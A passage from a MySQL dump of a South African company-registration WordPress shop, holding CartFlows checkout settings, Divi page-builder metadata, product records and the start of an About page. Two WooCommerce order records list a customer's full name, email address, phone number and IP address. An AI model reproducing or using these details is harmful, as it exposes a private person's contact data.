City\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:14:\"address-level2\";s:8:\"priority\";i:70;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:1:{s:0:\"\";s:0:\"\";}}s:13:\"billing_state\";a:11:{s:4:\"type\";s:5:\"state\";s:5:\"label\";s:5:\"State\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:8:\"validate\";a:1:{i:0;s:5:\"state\";}s:12:\"autocomplete\";s:14:\"address-level1\";s:8:\"priority\";i:80;s:13:\"country_field\";s:15:\"billing_country\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:1:{s:0:\"\";s:0:\"\";}}s:16:\"billing_postcode\";a:9:{s:5:\"label\";s:3:\"ZIP\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:8:\"validate\";a:1:{i:0;s:8:\"postcode\";}s:12:\"autocomplete\";s:11:\"postal-code\";s:8:\"priority\";i:90;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:1:{s:0:\"\";s:0:\"\";}}s:13:\"billing_phone\";a:10:{s:5:\"label\";s:5:\"Phone\";s:8:\"required\";b:1;s:4:\"type\";s:3:\"tel\";s:5:\"class\";a:1:{i:0;s:13:\"form-row-wide\";}s:8:\"validate\";a:1:{i:0;s:5:\"phone\";}s:12:\"autocomplete\";s:3:\"tel\";s:8:\"priority\";i:100;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:1:{s:0:\"\";s:0:\"\";}}s:13:\"billing_email\";a:10:{s:5:\"label\";s:13:\"Email address\";s:8:\"required\";b:1;s:4:\"type\";s:5:\"email\";s:5:\"class\";a:1:{i:0;s:13:\"form-row-wide\";}s:8:\"validate\";a:1:{i:0;s:5:\"email\";}s:12:\"autocomplete\";s:14:\"email username\";s:8:\"priority\";i:110;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:1:{s:0:\"\";s:0:\"\";}}}'),(20047,33135,'wcf_field_order_shipping','a:9:{s:19:\"shipping_first_name\";a:7:{s:5:\"label\";s:10:\"First name\";s:8:\"required\";b:1;s:5:\"class\";a:1:{i:0;s:14:\"form-row-first\";}s:12:\"autocomplete\";s:10:\"given-name\";s:8:\"priority\";i:10;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";}s:18:\"shipping_last_name\";a:7:{s:5:\"label\";s:9:\"Last name\";s:8:\"required\";b:1;s:5:\"class\";a:1:{i:0;s:13:\"form-row-last\";}s:12:\"autocomplete\";s:11:\"family-name\";s:8:\"priority\";i:20;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";}s:16:\"shipping_company\";a:7:{s:5:\"label\";s:12:\"Company name\";s:5:\"class\";a:1:{i:0;s:13:\"form-row-wide\";}s:12:\"autocomplete\";s:12:\"organization\";s:8:\"priority\";i:30;s:8:\"required\";b:0;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";}s:16:\"shipping_country\";a:8:{s:4:\"type\";s:7:\"country\";s:5:\"label\";s:7:\"Country\";s:8:\"required\";b:1;s:5:\"class\";a:3:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";i:2;s:23:\"update_totals_on_change\";}s:12:\"autocomplete\";s:7:\"country\";s:8:\"priority\";i:40;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";}s:18:\"shipping_address_1\";a:7:{s:5:\"label\";s:14:\"Street address\";s:11:\"placeholder\";s:28:\"House number and street name\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:13:\"address-line1\";s:8:\"priority\";i:50;s:7:\"default\";s:0:\"\";}s:18:\"shipping_address_2\";a:8:{s:5:\"label\";s:27:\"Apartment, suite, unit etc.\";s:11:\"label_class\";a:1:{i:0;s:18:\"screen-reader-text\";}s:11:\"placeholder\";s:38:\"Apartment, suite, unit etc. (optional)\";s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:13:\"address-line2\";s:8:\"priority\";i:60;s:8:\"required\";b:0;s:7:\"default\";s:0:\"\";}s:13:\"shipping_city\";a:7:{s:5:\"label\";s:11:\"Town / City\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:12:\"autocomplete\";s:14:\"address-level2\";s:8:\"priority\";i:70;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";}s:14:\"shipping_state\";a:10:{s:4:\"type\";s:5:\"state\";s:5:\"label\";s:5:\"State\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:8:\"validate\";a:1:{i:0;s:5:\"state\";}s:12:\"autocomplete\";s:14:\"address-level1\";s:8:\"priority\";i:80;s:13:\"country_field\";s:16:\"shipping_country\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";}s:17:\"shipping_postcode\";a:8:{s:5:\"label\";s:3:\"ZIP\";s:8:\"required\";b:1;s:5:\"class\";a:2:{i:0;s:13:\"form-row-wide\";i:1;s:13:\"address-field\";}s:8:\"validate\";a:1:{i:0;s:8:\"postcode\";}s:12:\"autocomplete\";s:11:\"postal-code\";s:8:\"priority\";i:90;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";}}'),(20048,33135,'wcf-checkout-box-note','yes'),(20049,33135,'wcf-checkout-box-note-text','Get Your FREE copy of CartFlows in just few steps.'),(20050,33135,'wcf-checkout-box-note-text-color',''),(20051,33135,'wcf-checkout-box-note-bg-color',''),(20052,33135,'wcf-checkout-step-one-title','Shipping'),(20053,33135,'wcf-checkout-step-one-sub-title','Where to ship it?'),(20054,33135,'wcf-checkout-step-two-title','Payment'),(20055,33135,'wcf-checkout-step-two-sub-title','Of your order'),(20056,33135,'wcf-checkout-offer-button-title','For Special Offer Click Here'),(20057,33135,'wcf-checkout-offer-button-sub-title','Yes! I want this offer!'),(20058,33135,'wcf-checkout-two-step-section-width','500'),(20059,33135,'wcf-checkout-two-step-section-border','solid'),(20060,33135,'wcf-field-width_billing_first_name','50'),(20061,33135,'wcf-field-width_billing_last_name','50'),(20062,33135,'wcf-field-width_billing_company','100'),(20063,33135,'wcf-field-width_billing_country','100'),(20064,33135,'wcf-field-width_billing_address_1','50'),(20065,33135,'wcf-field-width_billing_address_2','50'),(20066,33135,'wcf-field-width_billing_city','33'),(20067,33135,'wcf-field-width_billing_state','33'),(20068,33135,'wcf-field-width_billing_postcode','33'),(20069,33135,'wcf-field-width_billing_phone','100'),(20070,33135,'wcf-field-width_billing_email','100'),(20071,33135,'wcf-field-width_shipping_first_name','50'),(20072,33135,'wcf-field-width_shipping_last_name','50'),(20073,33135,'wcf-field-width_shipping_company','100'),(20074,33135,'wcf-field-width_shipping_country','100'),(20075,33135,'wcf-field-width_shipping_address_1','50'),(20076,33135,'wcf-field-width_shipping_address_2','50'),(20077,33135,'wcf-field-width_shipping_city','33'),(20078,33135,'wcf-field-width_shipping_state','33'),(20079,33135,'wcf-field-width_shipping_postcode','33'),(20080,33135,'_edit_lock','1566831563:1'),(20081,33135,'_et_pb_enable_shortcode_tracking',''),(20082,33135,'wcf-flow-id','33134'),(20083,33135,'wcf-step-type','checkout'),(20084,33135,'_et_pb_custom_css',''),(20085,33135,'_et_pb_gutter_width','3'),(20223,33224,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1566650314;}'),(20087,33135,'_et_pb_old_content',''),(20088,33135,'_edit_last','1'),(20089,33135,'_et_pb_first_image',''),(20090,33135,'_et_pb_truncate_post',''),(20091,33136,'cartflows_imported_step','yes'),(20092,33136,'_wp_page_template','cartflows-canvas'),(20093,33136,'_et_pb_post_hide_nav','default'),(20094,33136,'_et_pb_page_layout','et_right_sidebar'),(20095,33136,'_et_pb_side_nav','off'),(20096,33136,'_et_pb_use_builder','on'),(20097,33136,'wcf-field-google-font-url','//fonts.googleapis.com/css?family=Poppins|Poppins:600'),(20098,33136,'wcf-active-tab','wcf-thankyou-fields'),(20099,33136,'wcf-tq-advance-options-fields','yes'),(20100,33136,'wcf-show-overview-section','yes'),(20101,33136,'wcf-show-details-section','yes'),(20102,33136,'wcf-show-billing-section','no'),(20103,33136,'wcf-show-shipping-section','no'),(20104,33136,'_et_pb_show_page_creation','off'),(20105,33136,'_et_pb_built_for_post_type','page'),(20106,33136,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"31390\" /]'),(20107,33136,'_thumbnail_id','4632'),(20108,33136,'_et_builder_version','BB|Divi|3.26.3'),(20109,33136,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:3:{i:0;s:5:\"latin\";i:2;s:10:\"devanagari\";i:3;s:9:\"latin-ext\";}}'),(20110,33136,'wcf-tq-font-family','\'Poppins\', sans-serif'),(20111,33136,'wcf-tq-heading-font-family','\'Poppins\', sans-serif'),(20112,33136,'wcf-tq-heading-font-wt','600'),(20113,33136,'wcf-tq-container-width','750'),(20114,33136,'wcf-tq-section-bg-color','#f1f1f1'),(20115,33136,'enable-to-import','1'),(20116,33136,'_uabb_lite_converted','yes'),(20117,33136,'site-sidebar-layout','default'),(20118,33136,'site-content-layout','default'),(20119,33136,'theme-transparent-header-meta','default'),(20120,33136,'_edit_last','1'),(20121,33136,'_et_pb_first_image',''),(20122,33136,'_et_pb_truncate_post',''),(20123,33136,'_edit_lock','1563902778:1'),(20124,33136,'wcf-tq-heading-color',''),(20125,33136,'_et_pb_ab_stats_refresh_interval','hourly'),(20126,33136,'_et_pb_old_content',''),(20127,33136,'_et_pb_enable_shortcode_tracking',''),(20128,33136,'_et_pb_custom_css',''),(20129,33136,'_et_pb_gutter_width','3'),(20130,33136,'wcf-tq-text-color',''),(20131,33136,'wcf-flow-id','33134'),(20132,33136,'wcf-step-type','thankyou'),(20133,33136,'wcf-custom-script',''),(20135,33146,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566489555;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20136,33147,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566493430;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20137,33148,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566493430;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20254,33228,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1566650340;}'),(20262,33230,'_customer_ip_address','165.255.168.137'),(20263,33230,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(20264,33230,'_created_via','checkout'),(20265,33230,'_cart_hash','7ef1b7f8cccb8424403fe23d678b2b07'),(20266,33230,'_billing_first_name','Imraan'),(20267,33230,'_billing_last_name','Wajoodeen'),(20268,33230,'_billing_email','imraanmaw@gmail.com'),(20269,33230,'_billing_phone','0878025219'),(20270,33230,'_order_currency','ZAR'),(20271,33230,'_cart_discount','851'),(20272,33230,'_cart_discount_tax','0'),(20273,33230,'_order_shipping','0.00'),(20274,33230,'_order_shipping_tax','0'),(20275,33230,'_order_tax','0'),(20276,33230,'_order_total','399.00'),(20277,33230,'_order_version','3.7.0'),(20278,33230,'_prices_include_tax','no'),(20279,33230,'_billing_address_index','Imraan Wajoodeen        imraanmaw@gmail.com 0878025219'),(20280,33230,'_shipping_address_index','        '),(20281,33230,'is_vat_exempt','no'),(20282,33232,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1566652263;}'),(20283,33230,'_wcf_checkout_id','33135'),(20284,33230,'_wcf_flow_id','33134'),(20285,33230,'_wcf_bump_product',''),(20286,33230,'es_wc_activecampaign_opt_in','no'),(20289,33235,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1566653467;}'),(20290,33237,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1566653472;}'),(20291,33236,'_order_key','wc_order_ev8LH2IfrkTuO'),(20292,33236,'_customer_user','1'),(20293,33236,'_payment_method','payfast'),(20294,33236,'_payment_method_title','PayFast'),(20295,33236,'_customer_ip_address','165.255.168.137'),(20296,33236,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(20297,33236,'_created_via','checkout'),(20298,33236,'_cart_hash','7ef1b7f8cccb8424403fe23d678b2b07'),(20299,33236,'_billing_first_name','Imraan'),(20300,33236,'_billing_last_name','Wajoodeen'),(20301,33236,'_billing_email','imraanmaw@gmail.com'),(20302,33236,'_billing_phone','0878025219'),(20303,33236,'_order_currency','ZAR'),(20304,33236,'_cart_discount','851'),(20305,33236,'_cart_discount_tax','0'),(20306,33236,'_order_shipping','0.00'),(20307,33236,'_order_shipping_tax','0'),(20308,33236,'_order_tax','0'),(20309,33236,'_order_total','399.00'),(20310,33236,'_order_version','3.7.0'),(20311,33236,'_prices_include_tax','no'),(20312,33236,'_billing_address_index','Imraan Wajoodeen        imraanmaw@gmail.com 0878025219'),(20313,33236,'_shipping_address_index','        '),(20314,33236,'is_vat_exempt','no'),(20315,33238,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1566653467;}'),(20316,33236,'_wcf_checkout_id','33135'),(20317,33236,'_wcf_flow_id','33134'),(20318,33236,'_wcf_bump_product','31327'),(20319,33236,'es_wc_activecampaign_opt_in','no'),(20320,33239,'_action_manager_schedule','O:30:\"ActionScheduler_SimpleSchedule\":1:{s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1566653485;}'),(20321,33240,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566657087;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20322,33241,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566657087;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20366,33285,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566754664;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20398,33306,'_et_pb_custom_css',''),(20399,33306,'_et_pb_gutter_width','3'),(20400,33306,'_thumbnail_id',''),(20401,33306,'_et_pb_first_image',''),(20402,33306,'_et_pb_truncate_post',''),(20403,33306,'_et_builder_version','VB|Divi|3.27.3'),(20404,33306,'_et_pb_show_page_creation','off'),(20406,33314,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566812734;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20407,33317,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566817251;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20408,33318,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566817251;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20421,73,'_tax_status','taxable'),(20422,73,'_tax_class',''),(20423,73,'_download_limit','-1'),(20424,73,'_download_expiry','-1'),(20425,73,'_et_pb_post_hide_nav','default'),(20426,73,'_et_pb_page_layout','et_right_sidebar'),(20427,73,'_et_pb_side_nav','off'),(20428,73,'_et_pb_use_builder',''),(20429,73,'_et_builder_version','BB|Divi|3.27.3'),(20430,73,'_et_pb_first_image',''),(20431,73,'_et_pb_truncate_post',''),(20432,73,'_et_pb_ab_stats_refresh_interval','hourly'),(20433,73,'_et_pb_old_content',''),(20434,73,'_et_pb_enable_shortcode_tracking',''),(20435,73,'_et_pb_custom_css',''),(20436,73,'_et_pb_gutter_width','3'),(20438,31362,'wcf-pre-checkout-offer','yes'),(20439,31362,'wcf-pre-checkout-offer-desc','Right from negotiating deals, to raising sales orders, to invoicing, Zoho Books handles mundane accounting tasks so you can focus on your business.\r\n\r\nAll of our clients are on Zoho.\r\n\r\nNB: copy and paste in new window.\r\nwww.zoho.com/books/pricing/\r\n\r\nGet 2 months free + you show how to get another month free + we\'ll set it up for you.\r\n\r\nGet your accounting sorted from day 1, it\'s a nightmare to catchup.'),(20440,31362,'wcf-pre-checkout-offer-popup-title','{first_name}, Wait! Your Order Is Almost Complete...'),(20441,31362,'wcf-pre-checkout-offer-popup-sub-title','We have a special one time offer just for you.'),(20442,31362,'wcf-pre-checkout-offer-product-title','Zoho Cloud Accounting Annual Standard + FREE Setup within 24 hours'),(20443,31362,'wcf-pre-checkout-offer-popup-btn-text','Yes, Add to My Order!'),(20444,31362,'wcf-pre-checkout-offer-popup-skip-btn-text','No, thanks!'),(20445,31362,'wcf-pre-checkout-offer-discount',''),(20446,31362,'wcf-pre-checkout-offer-discount-value',''),(20447,31362,'wcf-pre-checkout-offer-bg-color','#eee'),(20448,33333,'_edit_lock','1566829480:1'),(20449,33334,'_edit_lock','1566830237:1'),(20450,33334,'_edit_last','1'),(20451,33335,'_edit_lock','1566829853:1'),(20452,31327,'_wp_trash_meta_status','publish'),(20453,31327,'_wp_trash_meta_time','1566829997'),(20454,31327,'_wp_desired_post_slug','company-register-2'),(20455,33334,'yikes_woo_products_tabs','a:0:{}'),(20456,33334,'_sku','MAI009'),(20457,33334,'_regular_price','450'),(20458,33334,'total_sales','0'),(20459,33334,'_tax_status','taxable'),(20460,33334,'_tax_class',''),(20461,33334,'_manage_stock','no'),(20462,33334,'_backorders','no'),(20463,33334,'_sold_individually','no'),(20464,33334,'_virtual','yes'),(20465,33334,'_downloadable','no'),(20466,33334,'_download_limit','-1'),(20467,33334,'_download_expiry','-1'),(20468,33334,'_stock',NULL),(20469,33334,'_stock_status','instock'),(20470,33334,'_wc_average_rating','0'),(20471,33334,'_wc_review_count','0'),(20472,33334,'_product_version','3.7.0'),(20473,33334,'_price','450'),(20474,33334,'_et_pb_post_hide_nav','default'),(20475,33334,'_et_pb_page_layout','et_right_sidebar'),(20476,33334,'_et_pb_side_nav','off'),(20477,33334,'_et_pb_use_builder',''),(20478,33334,'_et_builder_version','BB|Divi|3.27.3'),(20479,33334,'_et_pb_first_image',''),(20480,33334,'_et_pb_truncate_post',''),(20481,33334,'_et_pb_ab_stats_refresh_interval','hourly'),(20482,33334,'_et_pb_old_content',''),(20483,33334,'_et_pb_enable_shortcode_tracking',''),(20484,33334,'_et_pb_custom_css',''),(20485,33334,'_et_pb_gutter_width','3'),(20486,33334,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20487,31362,'wcf-pre-checkout-offer-product','a:1:{i:0;s:5:\"29583\";}');
/*!40000 ALTER TABLE `wpxb_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_posts`
--

DROP TABLE IF EXISTS `wpxb_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_title` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_excerpt` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
  `post_password` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `post_name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `to_ping` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `pinged` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `guid` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT 0,
  `post_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`),
  KEY `post_name` (`post_name`(191))
) ENGINE=MyISAM AUTO_INCREMENT=33368 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_posts`
--

LOCK TABLES `wpxb_posts` WRITE;
/*!40000 ALTER TABLE `wpxb_posts` DISABLE KEYS */;
INSERT INTO `wpxb_posts` VALUES (2,1,'2016-03-10 00:10:08','2016-03-10 00:10:08','[et_pb_section fb_built=\"1\" _builder_version=\"3.0.47\"][et_pb_row _builder_version=\"3.0.47\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.2.2\"]<p style=\"text-align: justify;\"><a href=\"https://companyregistration.online/wp-content/uploads/2016/03/companyregistration-business-card.png\" rel=\"attachment wp-att-14\"><img class=\"size-medium wp-image-14 alignleft\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/companyregistration-business-card-300x79.png\" alt=\"companyregistration business card\" width=\"300\" height=\"79\" /></a></p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">is a division of <a href=\"http://mawinc.co.za\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"MAW Inc.\">MAW Inc Chartered Accountants</a>.</p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">Running a business is a complex affair, with little or no resources a managing director or owner of a business may feel like he/she has to climb Everest on a daily basis.</p>\n<p style=\"text-align: justify;\">MAW Inc. primarily services businesses in the small to medium sector nurturing them from incubation to sustainable growth.</p>\n<h5 style=\"text-align: justify;\">How do we achieve this? <a href=\"https://companyregistration.online/wp-content/uploads/2016/03/Money-Back-Guarantee-300x300.jpg\"><img class=\"wp-image-28858 alignright\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Money-Back-Guarantee-300x300.jpg\" alt=\"\" width=\"195\" height=\"195\" /></a></h5>\n<p style=\"text-align: justify;\">Through our fashioned services on offer born from our intimate understanding of the sector, mostly because we operate in it ourselves.</p>\n<p style=\"text-align: justify;\">Our services are uncomplicated and output driven, achieving the results required to get the job done accurately, completely and with the required level of business acumen that maximizes results for our clients.</p>\n<p style=\"text-align: justify;\">With fifteen years experience in the industry we are able to offer our clients  a quality service coupled with value for money.  Everything we do is focussed on these two principles.</p>\n<p style=\"text-align: justify;\">Our staff are qualified at the highest level of their profession and include Chartered Accountants, Company Secretaries, Registered Auditors, Tax specialist [Tax Practitioners] and Advocates.</p>\n<p style=\"text-align: justify;\">We work intimately with small to medium business and have shared this fundamental philosophy with them, yielding remarkable results. Because at the core of any successful business is excellence of service and a value for money offering.</p>\n<h5><span style=\"color: #800080;\">So our guarantee to you is simple</span></h5>\n<blockquote>\n<p><span style=\"color: #800080;\">If you are dissatisfied with our service or we have not delivered within a reasonable time we will gladly refund any money spent on this website no questions asked.</span></p>\n<p><span style=\"color: #800080;\">Done.</span></p>\n</blockquote>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','publish','closed','closed','','about','','','2018-05-12 19:14:59','2018-05-12 17:14:59','',0,'https://companyregistration.online/?page_id=2',0,'page','',0),(4,1,'2016-03-11 22:00:07','2016-03-11 20:00:07','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" custom_padding=\"10px|0px|0px|0px\" custom_margin=\"|||\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|48px|0px|false|false\"][et_pb_row custom_padding=\"0px|0px|0px|0px\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: 